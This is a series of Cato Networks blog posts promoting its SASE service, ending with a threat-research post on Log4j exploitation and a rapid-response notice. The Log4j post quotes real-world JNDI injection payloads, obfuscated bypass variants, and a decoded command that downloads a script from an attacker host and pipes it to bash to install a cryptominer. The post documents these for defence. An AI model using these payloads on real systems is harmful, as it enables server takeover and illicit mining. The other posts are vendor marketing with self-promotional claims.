Improving remote access performance was one of the three main business priorities for all respondents. This makes perfect sense in the new work-from-everywhere reality; and this is one of the most straightforward use cases of SASE. Yet even here, SASE and non-SASE users experience the same problems. 24% of SASE users vs. 27% of non-SASE users complain about poor voice/video quality. Slow application response received the same 50% from both SASE and non-SASE users.
Respondents were also asked to rate the level of confidence in their ability to detect and respond to malware and cyber-attacks. Here too, results across the board were highly comparable. On a scale of
1-10 the average answer for SASE users was 4, and for non-SASE users 3.
Both answers indicate a low level of confidence in dealing with critical situations that can severely impact the network. Although Gartner claims that SASE is the future of network security, for these respondents it’s as if having SASE makes no difference at all.
[boxlink link="https://www.catonetworks.com/resources/the-total-economic-impact-of-cato-networks?utm_source=blog&utm_medium=top_cta&utm_campaign=tei"] What to expect when you’re expecting…SASE | Find Out [/boxlink]
Making Sense of the Confusion
Respondents already using SASE are confused – and probably disappointed – from their first experience with what was presented to them a SASE service. Be aware of vendors that take an appliance, convert it to a virtual machine, host it in the cloud and call it SASE. Unfortunately, this sounds like trying to deliver a Netflix-like service from stacking thousands of DVD players in the cloud. And, from the very beginning, Gartner advised to “avoid SASE offerings that are stitched together.”
We’re honored that Cato SASE Cloud users present the flip side of this confusion. Aligned with Gartner’s SASE framework, we deliver a converged, cloud-native platform that is globally distributed across 70+PoPs, and covers all edges. As opposed to confused respondents using so called SASE services, our customers clearly understand the value of SASE and have no dilemma when it comes to security and performance. SASE is not a trade-off between performance and security efficacy, but rather the convergence of both.
“With Cato, we could move people out from our offices to their home, ensuring the same security level, performance.”
“The big difference between Cato and other solutions is the integration of network management and security.”
“Cato provides us with a platform for delivering the networking and security capabilities that help our users increase their productivity.”
“The business is moving very fast. Now with Cato we can match that speed on the network side.”
What about all those non SASE users? What’s their strategy?
Only 29% indicated they have no plans to deploy SASE.
Clearly, respondents realize the value of SASE and admit that SASE is a must; the question for them isn’t if to migrate, but rather when. This is also in line with Gartner’s prediction that “by 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption.” Let’s hope these respondents are introduced to true SASE offerings and enjoy both security and performance. No compromising…
Understanding SASE is tricky because it has no “new cool feature.” Rather, SASE is an architectural shift that fundamentally changes how common networking and security...
New Gartner Report Explores The Portfolio or Platform Question for SASE Solutions Understanding SASE is tricky because it has no “new cool feature.” Rather, SASE is an architectural shift that fundamentally changes how common networking and security capabilities are delivered to users, locations, and applications globally. It is, primarily, a promise for a simple, agile, and holistic way of delivering secure and optimized access to everyone, everywhere, and on any device.
When Gartner introduced SASE in the 2019 report, The Future of Network Security is in the Cloud, the analyst firm highlighted convergence of network and network security services as the main architectural attribute of SASE. According to Gartner, “This market converges network (for example, software-defined WAN [SD-WAN]) and network security services (such as SWG, CASB and firewall as a service [FWaaS]). We refer to it as the secure access service edge and it is primarily delivered as a cloud-based service.”
Cobbling together multiple products wasn’t a converged approach from both technology and management perspectives. Many vendors got the message and started to create their single-vendor solutions. Some developed missing components, such as adding SD-WAN capability to a firewall appliance. Others acquired pieces such as SD-WAN, CASB, or Remote Browser Isolation (RBI) to build on to existing solutions. According to Gartner ® Market Opportunity Map: Secure Access Service Edge, Worlwide1 report, by 2023, no less than 10 vendors will offer a one-stop-shop SASE solution.
Cato is a big proponent of “convergence" as a key requirement for fulfilling the SASE promise. The direction of many SASE vendors is towards a “one stop shop.” Does “convergence” equal “one-stop shop” and should you care?
[boxlink link="https://www.catonetworks.com/resources/what-to-expect-when-youre-expectingsase/?utm_source=blog&utm_medium=top_cta&utm_campaign=expecting_sase"] The Total Economic Impact™ of Cato's SASE Cloud | Read Report [/boxlink]
SASE: Platform (“convergence”) does not mean Portfolio (owned by a “one stop shop”)
The answer to that question was addressed in a recent research paper from Gartner titled "Predicts 2022: Consolidated Security Platforms Are the Future"2 There Gartner makes a key distinction between Portfolio and Platform security companies. According to Gartner:
“Vendors are taking two clear approaches to consolidation:
Platform Approach
Leverage interdependencies and commonalities among adjacent systems
Integrating consoles for common functions
Support for organizational business objectives at least as effectively as best-of-breed
Integration and operational simplicity mean security objectives are also met.
Portfolio Approach
Leveraged set of unintegrated or lightly integrated products in a buying package
Multiple consoles with little to no integration and synergy
Legacy approach in a vendor wrapper
Will not fulfill any of the promised advantages of consolidation.
Differentiating between these approaches is key to the efficiency of the suite, and vendor marketing will always say they are a platform. As you evaluate products, you must look at how integrated the consoles are for the management and monitoring of the consolidated platform. Also, assess how security elements (such as data definitions, malware engines) and more can be reused without being redefined, or can apply across multiple areas seamlessly. Multiple consoles and multiple definitions are warnings that this is a portfolio approach that should be carefully evaluated.”
SASE Platforms Require Cloud-based Delivery
Convergence of networking and security is, however, just one step towards fulfilling the SASE promise. Cloud-based delivery is the key ingredient for achieving the operational and security benefits of SASE. According to Gartner:
“As the platforms shift to the cloud for management, analysis and even delivery, the ability to leverage the shared responsibility model for security brings enormous benefits to the consumer. However, this extends the risk surface to the vendor and requires further due diligence in third-party vendor management. The benefits include:
Lack of physical technical debt; there is no hardware to amortize before shifting vendors or technology.
The end-customer’s data center footprint is reduced or eliminated for key technologies.
Operational tasks (e.g., patching, upgrades, performance scaling and maintenance) are performed by the cloud provider. The system is maintained and monitored around the clock, and the staffing of the provider supplements that of the end customer.
Controls are placed close to the hybrid modern workforce and to the distributed modern data; the path is not forced through an arbitrary, customer-owned location for filtering.
Despite being large targets, cloud-native security vendors have the scale and focus to secure, manage, and monitor their infrastructure better than most individual organizations.”
Gartner analysts Neil MacDonald and Charlie Winckless in the report predict that “[B]y 2025, 80% of enterprises will have adopted a strategy to unify web, cloud services and private application access from a single vendor’s SSE [secure service edge] platform.” One of their key findings that led to this strategic planning assumption is:
“Single-vendor solutions provide significant operational efficiency and security efficacy, compared with best-of-breed, including reduced agent bloat, tighter integration, fewer consoles to use, and fewer locations where data must be decrypted, inspected, and recrypted.”
The report further states:
“The shift to remote work and the adoption of public cloud services was well underway already, but it has been further accelerated by COVID-19. SSE allows the organization to support anywhere, anytime workers using a cloud-centric approach for the enforcement of security policy. SSE offers immediate opportunities to reduce complexity, costs and the number of vendors.”
Cato: The SASE Platform powered by a Global Backbone
How does Cato measure up to this vision of the future? Cato was built from the ground up as a cloud-native service, built on one global backbone, to deliver one security stack, managed from a single console, and enforcing one comprehensive networking and security policy on all users, locations, and applications—and it’s all available today from this single vendor.
We welcome you to test drive the simple, agile, and holistic Cato SASE Cloud. We promise an eye-opening experience.
Learn more:
Security Service Edge (SSE): It’s SASE without the “A” (blog post)
How to Secure Remote Access (blog post)
The Future of Security: Do All Roads Lead to SASE? (webinar)
8 Ways SASE Answers Your Future IT & Security Needs (eBook)
1 Gartner, “Market Opportunity Map: Secure Access Service Edge, Worldwide ” Joe Skorupa, Nat Smith, and Even Zeng. July 16, 2021
2 Gartner, “Predicts 2022: Consolidated Security Platforms Are the Future” Charlie Winckless, Joerg Fritsch, Peter Firstbrook, Neil MacDonald, and Brian Lowans. December 1, 2021
GARTNER is registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.
The networking industry loves a good buzzword as much as any other IT sector. Network-as-a-Service (NaaS) certainly fits that billing. The term has been around...
What is Network-as-a-Service and Why WAN Transformation Needs NaaS and SASE The networking industry loves a good buzzword as much as any other IT sector. Network-as-a-Service (NaaS) certainly fits that billing. The term has been around for at least a decade has come back in vogue to describe networking purchased on a subscription basis.
But what’s particularly interesting for anyone moving away from a global MPLS network or otherwise looking at WAN transformation is the impact NaaS will have on evolving the enterprise backbone. For all of its talk, SASE as understood by much of the industry, will not completely replace a global MPLS network; the Internet is simply too unpredictable for that. Only by converging SASE with NaaS can companies eliminate costly, legacy MPLS services.
What is NaaS (Network-as-a-Service)
Exactly what constitutes a NaaS is open to some debate. All agree that NaaS offerings allow enterprises to consume networking on a subscription basis without having to deploy any hardware. According to a recent Network World article, IDC’s senior research analyst Brandon Butler wrote in a recent whitepaper "NaaS models are inclusive of integrated hardware, software, licenses and support services delivered in a flexible consumption or subscription-based offering.”
Cisco in its recent report flushed that out a bit further defining NaaS as “a cloud-enabled, usage-based consumption model that allows users to acquire and orchestrate network capabilities without owning, building, or maintaining their own infrastructure,” writes industry analyst, Tom Nolle.
Gartner identifies the specific attributes of a cloud service. According to Gartner’s Andrew Lerner, “NaaS is a delivery model for networking products. NaaS offerings deliver network functionality as a service, which include the following capabilities:
elf-service capability
on-demand usage,
Ability to scale up and down.
billed on an opex model
consumption-based, via a metered metric (such as ports, bandwidth or users), (not based on network devices/appliances).
NaaS offerings may include elements such as network switches, routers, gateways and firewalls.”
For those running datacenter networks, Network World reports NaaS offerings will allow them to purchase compute, networking, and storage components configured through an API and controlled by a common management package. (Personally, I find the focus on the appliance form factor a reflection of legacy thinking. Gartner’s view of a consumption-based model based on bandwidth or users, not appliances, I think to be more accurate but let’s leave that aside for the comment.)
But for those involved in the WAN, NaaS is also increasingly coming to describe a new kind of backbone, one that’s programmable, sold on a subscription basis, and designed for the cloud. “I see NaaS as a way to describe agile, programmable backbones and interconnections in a hybrid, multi-cloud architecture,” wrote Shamus McGillicuddy, vice president of network management research at Enterprise Management Associates in an email.
[boxlink link="https://www.catonetworks.com/resources/terminate-your-mpls-contract-early-heres-how/?utm_source=blog&utm_medium=top_cta&utm_campaign=terminate_mpls_ebook"] Terminate Your MPLS Contract Early | Here’s How [/boxlink]
NaaS Must Meet SASE
But here’s the thing, with the proliferation of threats any networking service cannot be divorced from security policy enforcement and threat prevention. It’s why SASE has emerged to be such a dominant force. The convergence of SD-WAN with four areas of security -- NGFW, SWG, CASB, and ZTNA – enables enterprises to extend security policies everywhere will also being more effective and more efficient. (Just check out what our customers say if you want first-hand proof.)
But SASE alone can’t replace MPLS. Converging SD-WAN and security still doesn’t address the need for a predictable, efficient global backbone. And the public Internet is far too unpredictable, too inefficient to support the global enterprise. What’s needed is to converge SASE with a backbone NaaS – a global private backbone delivered on subscription basis.
Cato: The Global SASE Platform That Includes NaaS
The Cato SASE Cloud is the only SASE platform that operates across its own global private backbone, providing SASE and backbone NaaS in one. With the Cato SASE platform, enterprises not only converge security with SD-WAN, but they also get predictable, optimized global connectivity.
“Cato Networks operates its own security network as a service (NaaS) providing a range of
security services including SWG, FWaaS, VPN, and MDR from its own cloud-based network,” writes Futuriom in its “Cloud Secure Edge and SASE Trends Report.” (Click on the link to download the report for free)
The Cato private backbone is a global, geographically distributed, SLA-backed network of 65+ PoPs, interconnected by multiple tier-1 carriers. Each PoP run Cato’s cloud-native software stack that along with security convergence provides global routing optimization and WAN optimization for maximum end-to-end throughput.
Our software continuously monitors network services for latency, packet loss, and jitter to determine, in real-time, the best route for sending every network packet. In fact, according to independent testing, is the only backbone NaaS in the world to include WAN optimization and, as a result, increases iPerf throughput 10x-20x over what you’d expect to see with MPLS or Internet. The backbone is fully encrypted for maximum security and self-healing for maximum uptime.
The Cato Socket, Cato’s edge SD-WAN device, automatically connects to the nearest Cato PoP. All outbound site traffic is sent to the PoP. Policies then direct Internet traffic out to the Internet and the rest across the Cato backbone.
SASE and NaaS Better Together
Converging SASE and backbone NaaS together also offers unique advantages compared to keeping the two separate. Deployment becomes incredibly quick. Customers can often bring up new locations on Cato -- complete with SD-WAN, routing policies, access policies, malware protection rules, and global backbone connections – in under two hours and without expert IT assistance.
Convergence also allows for deeper insights. Cato captures and stores the metadata of every traffic flow from every user across its global private backbone in a massive data lake. This incredible resource enables Cato engineers to do all sorts of “what if” analysis, which would otherwise be impossible. One practical example – the Cato Event screen, which displayed all connectivity, routing, security, system, and Socket management events on one queryable timeline for the past year. Suddenly it becomes very simple to see why users might be having a problem. Was it a last-mile issue? A permissions issue caused by a reconfigured firewall rule? Something else? Identifying root cause becomes much quicker and simpler when you have a single, holistic view of your infrastructure.
[caption id="attachment_21441" align="alignnone" width="1920"] Converging the backbone, SD-WAN, and security into one service enables all events to be presented in a single screen for easy troubleshooting. [/caption]
WAN Transformation That Makes Sense
In short, converging NaaS and SASE together results in better WAN transformation, one that reduces cost, simplifies security, and improves performance all without compromising on the predictability and reliability enterprises expect from their networks.
Hard to believe? Yeah, we get that. It’s why we’ve been called the “Apple of networking.” But don’t take our word for it. Take us for test drive and see for yourself. We can usually get a POC set up in minutes and hours not days. But that shouldn’t be a surprise. We’re an “as a service” after all.
Hundreds of millions of people worldwide were directed to work remotely in 2020 in response to pandemic lockdowns. Even as such restrictions are beginning to...
December 21, 2021
7m read
How to Secure Remote Access Hundreds of millions of people worldwide were directed to work remotely in 2020 in response to pandemic lockdowns. Even as such restrictions are beginning to ease in some countries and employees are slowly returning to their offices, remote work continues to be a popular workstyle for many people.
Last June, Gartner surveyed more than 100 company leaders and learned that 82% of respondents intend to permit remote working at least some of the time as employees return to the workplace. In a similar pattern, out of 669 CEOs surveyed by PwC, 78% say that remote work is a long-term prospect. For the foreseeable future, organizations must plan how to manage a more complex, hybrid workforce as well as the technologies that enable their productivity while working remotely.
The Importance of Secure Remote Access
Allowing employees to work remotely introduces new risks and vulnerabilities to the organization. For example, people working at home or other places outside the office may use unmanaged personal devices with a suspect security posture. They may use unsecured public Internet connections that are vulnerable to eavesdropping and man-in-the-middle attacks. Even managed devices over secured connections are no guarantee of a secure session, as an attacker could use stolen credentials to impersonate a legitimate user. Therefore, secure remote access should be a crucial element of any cybersecurity strategy.
[boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | Download eBook [/boxlink]
How to Secure Remote Access: Best Practices
Secure remote access requires more than simply deploying a good technology solution. It also demands a well-designed and observed company security policy and processes to prevent unauthorized access to your network and its assets. Here are the fundamental best practices for increasing the security of your remote access capabilities.
1. Formalize Company Security Policies
Every organization needs to have information security directives that are formalized in a written policy document and are visibly supported by senior management. Such a policy must be aligned with business requirements and the relevant laws and regulations the company must observe. The tenets of the policy will be codified into the operation of security technologies used by the organization.
2. Choose Secure Software
Businesses must choose enterprise-grade software that is engineered to be secure from the outset. Even small businesses should not rely on software that has been developed for a consumer market that is less sensitive to the risk of cyber-attacks.
3. Encrypt Data, Not Just the Tunnel
Most remote access solutions create an encrypted point-to-point tunnel to carry the communications payload. This is good, but not good enough. The data payload itself must also be encrypted for strong security.
4. Use Strong Passwords and Multi-Factor Authentication
Strong passwords are needed for both the security device and the user endpoints. Cyber-attacks often happen because an organization never changed the default password of a security device, or the new password was so weak as to be ineffective. Likewise, end-users often use weak passwords that are easy to crack. It’s imperative to use strong passwords and MFA from end to end in the remote access solution.
5. Restrict Access Only to Necessary Resources
The principle of least privilege must be utilized for remote access to resources. If a person doesn’t have a legitimate business need to access a resource or asset, he should not be able to get to it.
6. Continuously Inspect Traffic for Threats
The communication tunnel of remote access can be compromised, even after someone has logged into the network. There should be a mechanism to continuously look for anomalous behavior and actual threats. Should it be determined that a threat exists, auto-remediation should kick in to isolate or terminate the connection.
Additional Considerations for Secure Remote Access
Though these needs aren’t specific to security, any remote access solution should be cost-effective, easy to deploy and manage, and easy for people to use, and it should offer good performance. Users will find a workaround to any solution that is slow or hard to use.
Enterprise Solutions for Secure Remote Access
There are three primary enterprise-grade solutions that businesses use today for secure remote access: Virtual Private Network (VPN); Zero Trust Network Access (ZTNA); and Secure Access Service Edge (SASE). Let’s have a look at the pros and cons of each type of solution.
1. Virtual Private Network (VPN)
Since the mid-1990s, VPNs have been the most common and well-known form of secure remote access. However, enterprise VPNs are primarily designed to provide access for a small percentage of the workforce for short durations and not for large swaths of employees needing all-day connectivity to the network.
VPNs provide point-to-point connectivity. Each secure connection between two points requires its own VPN link for routing traffic over an existing path. For people working from home, this path is going to be the public Internet. The VPN software creates a virtual private tunnel over which the user’s traffic goes from Point A (e.g., the home office or a remote work location) to Point B (usually a terminating appliance in a corporate datacenter or in the cloud). Each terminating appliance has a finite capacity for simultaneous users; thus, companies with many remote workers may need multiple appliances. VPN visibility is limited when companies deploy multiple disparate appliances.
Security is still a considerable concern when VPNs are used. While the tunnel itself is encrypted, the traffic traveling within that tunnel typically is not. Nor is it inspected for malware or other threats. To maintain security, the traffic must be routed through a security stack at its terminus on the network. In addition to inefficient routing and increased network latency, this can result in having to purchase, deploy, monitor, and maintain security stacks at multiple sites to decentralize the security load. Simply put, providing security for VPN traffic is expensive and complex to manage.
Another issue with VPNs is that they provide overly broad access to the entire network without the option of controlling granular user access to specific resources. There is no scrutiny of the security posture of the connecting device, which could allow malware to enter the network. What’s more, stolen VPN credentials have been implicated in several high-profile data breaches. By using legitimate credentials and connecting through a VPN, attackers were able to infiltrate and move freely through targeted company networks.
2. Zero Trust Network Access (ZTNA)
An up-and-coming VPN alternative is Zero Trust Network Access, which is sometimes called a software-defined perimeter (SDP). ZTNA uses granular application-level access policies set to default-deny for all users and devices. A user connects to and authenticates against a Zero Trust controller, which implements the appropriate security policy and checks device attributes. Once the user and device meet the specified requirements, access is granted to specific applications and network resources based upon the user’s identity. The user’s and device’s status are continuously verified to maintain access.
This approach enables tighter overall network security as well as micro-segmentation that can limit lateral movement in the event a breach occurs.
ZTNA is designed for today’s business. People work everywhere — not only in offices — and applications and data are increasingly moving to the cloud. Access solutions need to be able to reflect those changes. With ZTNA, application access can dynamically adjust based on user identity, location, device type, and more. What’s more, ZTNA solutions provide seamless and secure connectivity to private applications without placing users on the network or exposing apps to the internet.
ZTNA addresses the need for secure network and application access but it doesn’t perform important security functions such as checking for malware, detecting and remediating cyber threats, protecting web-surfing devices from infection, and enforcing company policies on all network traffic. These additional functions, however, are important offerings provided by another secure remote access solution known as Secure Access Service Edge.
3. Secure Access Service Edge (SASE)
SASE converges ZTNA, NextGen firewall (NGFW), and other security services along with network services such as SD-WAN, WAN optimization, and bandwidth aggregation into a cloud-native platform. Enterprises that leverage a SASE networking architecture receive the security benefits of ZTNA, plus a full suite of converged network and security solutions that is both simple to manage and highly scalable. It is the optimal enterprise VPN alternative, and the Cato SASE solution provides it all in a cloud-native platform.
Cato’s SASE solution enables remote users, through a client or clientless browser access, to access all business applications via a secure and optimized connection. The Cato Cloud, a global cloud-native service, can scale to accommodate any number of users without deploying a dedicated VPN infrastructure. Remote workers (mobile users too!) connect to the nearest Cato PoP – there are more than 60 PoPs worldwide – and their traffic is optimally routed across the Cato global private backbone to on-premises or cloud applications. Cato’s Security as a Service stack protects remote users against threats and enforces application access control.
The Cato SASE platform provides optimized and highly secure remote access management for all remote workers. For more information on how to support your remote workforce, get the free Cato ebook Work From Anywhere for Everyone.
If a picture tells a thousand words, then a new user interface tells a million. The new Cato Management Application that we announced today certainly...
December 14, 2021
4m read
Independent Compliance and Security Assessment – Two Additions to the All-New Cato Management Application If a picture tells a thousand words, then a new user interface tells a million. The new Cato Management Application that we announced today certainly brings a scalable, powerful interface. But it’s far more than just another pretty face. It’s a complete restructuring of the backend event architecture and a new frontend with more than 103 improvements.
New dashboards and capabilities can be found throughout the platform. We improved cloud insight with a new advanced cloud catalog. New independent conformance testing for regulatory compliance and security capabilities is, I think, a first in the industry. We enhanced security reporting with an all-new threats dashboard and opened up application performance with another new dashboard. Let’s take a closer look at some of these changes.
New Topology View and a New Backend
The top-level topology view has been redesigned to accommodate deployments of thousands of sites and tens of thousands of users. But in the new Management Application, we’ve enabled customization of the top-level view, enabling you to decide how much detail to show across all edges — sites, remote users, and cloud assets — connected to and are secured by Cato SASE Cloud (see Figure 1).
[caption id="attachment_20988" align="alignnone" width="1024"] Figure 1 Cato’s new Management Application lets enterprises continue to manage their network, security, and access infrastructure from a common interface (1). The new front-end is completely customizable and can surface the providers (2) connecting sites and remote users. You can easily identify problematic sites (3) and drill down into a user or location’s stats at a click (4). [/caption]
Behind the Cato Management Application is a completely rearchitected backend. Improved query analytics for site metrics and events makes the process more efficient and the interface more responsive even with customer environments generating over 2 billion events per day. A new event pipeline increases the event retrieval volume while allowing NetOps and NetSecOps to be more specific and export just the necessary events.
[boxlink link="https://www.catonetworks.com/resources/management-application-walkthrough/"] Cato Management Application
[30 min Walkthrough] | Take the Tour [/boxlink]
Independent Compliance Rating Revolutionizes Compliance and Security Verification
A new cloud application catalog has been introduced with 5000 of the most common enterprise applications. For each application, the catalog includes a detailed description of the target app automatically generated by a proprietary data mining service and an independently verified risk score (see Figure 2).
[caption id="attachment_20990" align="alignnone" width="1920"] Figure 2: The new Cloud Apps Catalog contains more than 5000 applications with an overall risk score[/caption]
The risk score is based on Cato’s automated and independent assessment of the cloud application’s compliance levels and security capabilities. Using the massive data lake we maintain of the metadata from every flow crossing Cato’s Global Private Backbone, machine learning algorithms automatically check an application’s claimed regulatory compliance and security features. Currently, Cato regulatory compliance verification includes HIPAA, PCI, and SOC 1-3. Security feature verification includes MFA, encryption of data at rest, and SSO (see Figure 3).
[caption id="attachment_20992" align="alignnone" width="1660"] Figure 3: Cato independently verifies the application’s conformance with regulations and security features[/caption]
New Threat Dashboard Identifies Key Threats Across the Enterprise
[caption id="attachment_21022" align="alignnone" width="1919"] Figure 4: The new Threat Dashboard provides a snapshot of threats across enterprise security infrastructure for assessing the company’s Shadow IT position[/caption]
The new Threat Dashboard summarizes the insights drawn from Cato’s Managed IPS, FWaaS, SWG, and Anti-Malware services. Through a single dashboard, security teams can see the top threats across the enterprise. A dynamic, drill-down timeline allows security teams to gather more insight. Top hosts and users identify the impacted individuals and endpoints (Figure 4).
New Application Dashboard Provides Snapshot of Usage Analytics
With the new Application Dashboard, you gain an overall view of your enterprise application analytics. Administrators can easily understand current and historical bandwidth consumption and flow generation by combinations of sites, users, applications, domains, and categories (Figure 5).
[caption id="attachment_20996" align="alignnone" width="1442"] Figure 5: The new Application Analytics dashboard provides an overview of an application usage that can be easily segmented by combinations of multiple dimensions. In this case, application consumption is shown for each user at a particular site.[/caption]
The Cato Management Application is currently available at no additional charge. To learn more about the management platform, click here or check out this 30 min walkthrough video. You can also contact us for a personal demo.
On December 9, a critical zero-day vulnerability was discovered in Apache Log4j, a very common Java logging tool. Exploiting this vulnerability allows attackers to take...
December 13, 2021
5m read
Log4J – A Look into Threat Actors Exploitation Attempts On December 9, a critical zero-day vulnerability was discovered in Apache Log4j, a very common Java logging tool. Exploiting this vulnerability allows attackers to take control over the affected servers, and this prompted a CVSS (Common Vulnerability Scoring System) severity level of 10.
LogJam, also known as Log4Shell, is particularly dangerous because of its simplicity – forcing the application to write just one simple string allows attackers to upload their own malicious code to the application. To make things worse, working PoCs (Proof of Concept) are already available on the internet, making even inexperienced attackers a serious threat.
Another reason this vulnerability is getting so much attention is the mass adoption of Log4j by many enterprises. Amazon, Steam, Twitter, Cisco, Tesla, and many others all make use of this library, which means different threat actors have a very wide range of targets from which to choose. As the old saying goes – not every system is vulnerable, not every vulnerability is exploitable and not every exploit is usable, but when all of these align
Quick Mitigation
At Cato, we were able to push mitigation in no-time, as well as have it deploy across our network, requiring no action whatsoever from customers with IPS enabled. The deployment was announced in our Knowledge Base together with technical details for customers.
Moreover, we were able to set our detections based on traffic samples from the wild, thus minimizing the false positive rate from the very first signature deployment, and maximizing the protection span for different obfuscations and bypass techniques.
Here are a couple of interesting exploit attempts we saw in the wild. These attempts are a good representation of an attack’s lifecycle and adoption by various threat actors, once such a vulnerability goes public.
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the rise | Download eBook [/boxlink]
Exploit Trends and Anecdotes
We found exploit attempts using the normal attack payload:
${jndi:ldap://<MALICIOUS DOMAIN>/Exploit}
We identified some interesting variations and trends:
Adopted by Scanners
Interestingly, we stumbled across scenarios of a single IP trying to send the malicious payload over a large variety of HTTP headers in a sequence of attempts:
Access-Control-Request-Method: ${jndi:ldap://<REDACTED_IP>:42468/a}
Access-Control-Request-Headers: ${jndi:ldap://<REDACTED_IP>:42468/a}
Warning: ${jndi:ldap://<REDACTED_IP>:42468/a}
Authorization: ${jndi:ldap://<REDACTED_IP>:42468/a}
TE: ${jndi:ldap://<REDACTED_IP>:42468/a}
Accept-Charset: ${jndi:ldap://<REDACTED_IP>:42468/a}
Accept-Datetime: ${jndi:ldap://<REDACTED_IP>:42468/a}
Date: ${jndi:ldap://<REDACTED_IP>:42468/a}
Expect: ${jndi:ldap://<REDACTED_IP>:42468/a}
Forwarded: ${jndi:ldap://<REDACTED_IP>:42468/a}
From: ${jndi:ldap://<REDACTED_IP>:34467/a}
X-Api-Version: ${jndi:ldap://<REDACTED_IP>:42468/a}
Max-Forwards: ${jndi:ldap://<REDACTED_IP>:34467/a}
Such behavior might be attributed to Qualys vulnerability scanner, which claimed to add a number of tests that attempt sending the Log4j vulnerability payloads across different HTTP headers. While it’s exciting to see the quick adoption of pentesting and scanning tools for this new vulnerability, one can’t help but wonder what would happen if these tools were used by malicious actors.
Sinkholes Created
nspecting attack traffic allowed us to find sinkhole addresses used for checking vulnerable devices. Sinkholes are internet-facing servers that collect traffic sent to them when a vulnerability PoC is found to be successful.
A bunch of HTTP requests with headers such as the ones below indicate the use of a sinkhole:
User-Agent: ${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent
User-Agent: ${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}
We can tell that the sinkhole address matches the protocol and header on which the exploit attempt succeeds.
This header seen in the wild:
X-Api-Version: ${jndi:ldap://<REDACTED>.burpcollaborator.net/a
This is an example of using the burpcollaborator platform for sinkholing successful PoCs. In this case, the header used was an uncommon one, trying to bypass security products that might have overlooked it.
Among many sinkholes, we also noticed <string>.bingsearchlib.com, as mentioned here too.
Bypass Techniques
Bypass techniques are described in a couple of different GitHub projects ([1], [2]). These bypass techniques mostly leverage syntactic flexibility to alter the payload to one that won’t trigger signatures that capture the traditional PoC example only. Some others alter the target scheme from the well-known ldap:// to rmi://, dns:// and ldaps://
A funny one we found in the wild is:
GET /?x=${jndi:ldap://1.${hostName}.<REDACTED>.interactsh.com/a}
Host: <REDACTED_IP>:8080
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.<REDACTED>.interactsh.com}
Connection: close
Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.<REDACTED>.interactsh.com}
Accept-Encoding: gzip
In this request, the attacker attempted three different attack methods: the regular one (in green), as well as two obfuscated ones (in purple and orange).
Seems like they’ve assumed a target that would modify the request, replacing the malicious part of the payload with a sanitized version. However, they missed the fact that many modern security vendors would drop this request altogether, leaving them exposed to being signed and blocked by their “weakest link of obfuscation.”
Real Attacks – Cryptomining on the Back of Exploitation Victims
While many of the techniques described above were used by pentesting tools and scanners to show a security risk, we also found true malicious actors attempting to leverage CVE-2021-44228 to drop malicious code on vulnerable servers. The attacks look like this:
Authorization: ff=${jndi:ldap://<REDACTED_IP>:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}
Base64-decoding the payload above reveals the attacker’s intentions:
…
(wget -O – http[:]//<REDACTED_IP>:8005/acc||curl -o – http[:]//<REDACTED_IP>:8005/acc)|/bin/bash
Downloading the file named acc leads to a bash code that downloads and runs XMrig cryptominer. Furthermore, before doing so it closes all existing instances of the miner and shuts them off if their CPU usage is too high to keep under the radar. Needless to say, the mined crypto coins make their way to the attacker’s wallet.
The SANS Honeypot Data API provides access to similar findings and variations of true attacks that target their honeypots.
The Apache Log4j vulnerability poses a great risk to enterprises that fail to mitigate it on time. As we described, the vulnerability was promptly used not only by legitimate scanners and pentesting tools, but by novice and advanced attackers, as well. Cato customers were well taken care of. We made sure the risk was promptly mitigated and notified our customers that their networks are safe. Read all about it in our blog post: Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability. So until the next time....
On December 9th, 2021, the security industry became aware of a new vulnerability, CVE-2021-44228. With a CVSS (Common Vulnerability Scoring System) score of a perfect...
December 12, 2021
4m read
Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability On December 9th, 2021, the security industry became aware of a new vulnerability, CVE-2021-44228. With a CVSS (Common Vulnerability Scoring System) score of a perfect 10.0, CVE-2021-442288 has the highest and most critical alert level.
To give some technical background, a flaw was found in the Java logging library “Apache Log4j 2” in versions from 2.0-beta9 to 2.14.1. This could allow a remote attacker to execute code on a server running Apache if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.
More simply put, this exploit would allow attackers to execute malicious code on Java applications, and as such, it poses a significant risk due to the prevalence of Log4j across the global software estate.
Cato’s Security Researchers Never Sleep, So You Can
Since the disclosure, the security analysts here at Cato Networks have been working tirelessly to identify, pinpoint and mitigate any potential vulnerability or exposure that our customers may have to this threat.
Here is our internal log of operations:
9th December 2021: The security community became aware of active exploitation attempts in the Apache Log4j software.
10th December 2021: Cato Networks identified the traffic signature associated with this exploit and started actively monitoring our customer base.
11th December 2021: Cato Networks has implemented a global blocking rule within our IPS for all Cato customers to mitigate this vulnerability.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink]
Action Items to Cato Customers: Just Read eMails
Cato customers have already been informed that if they have the Cato IPS enabled, they are protected. Cato is actively blocking the traffic signature of this vulnerability automatically. No patching or updates to the Cato platform is required.
